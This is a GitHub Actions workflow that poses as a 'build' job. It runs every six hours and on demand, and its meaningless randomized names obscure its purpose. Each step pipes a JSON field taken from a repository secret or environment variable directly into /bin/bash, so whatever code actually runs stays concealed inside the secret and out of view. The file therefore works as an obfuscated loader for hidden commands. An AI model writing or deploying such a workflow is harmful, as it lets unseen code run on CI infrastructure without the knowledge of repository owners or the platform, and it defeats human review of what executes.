name: nkchla
on:
  workflow_dispatch:
  schedule:
    - cron: '44 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: nkchla
        env:
          xatgu549: ${{ secrets.xatgu549 }}
        run: |
          echo $xatgu549 | jq -r .orwj7 | /bin/bash
          echo $x533 | jq -r .dlcnr361 | /bin/bash
          echo $ft11 | jq -r .c47936 | /bin/bash
          echo $vjjt4 | jq -r .arzq7 | /bin/bash
          echo $wou12143 | jq -r .jj0 | /bin/bash
          echo $t4525 | jq -r .dr335 | /bin/bash
          echo $ujk88 | jq -r .cdcli89567 | /bin/bash
          echo $ibt0 | jq -r .vprau839 | /bin/bash
          echo $wdkq402 | jq -r .l618 | /bin/bash
          echo $juieo781 | jq -r .n317 | /bin/bash

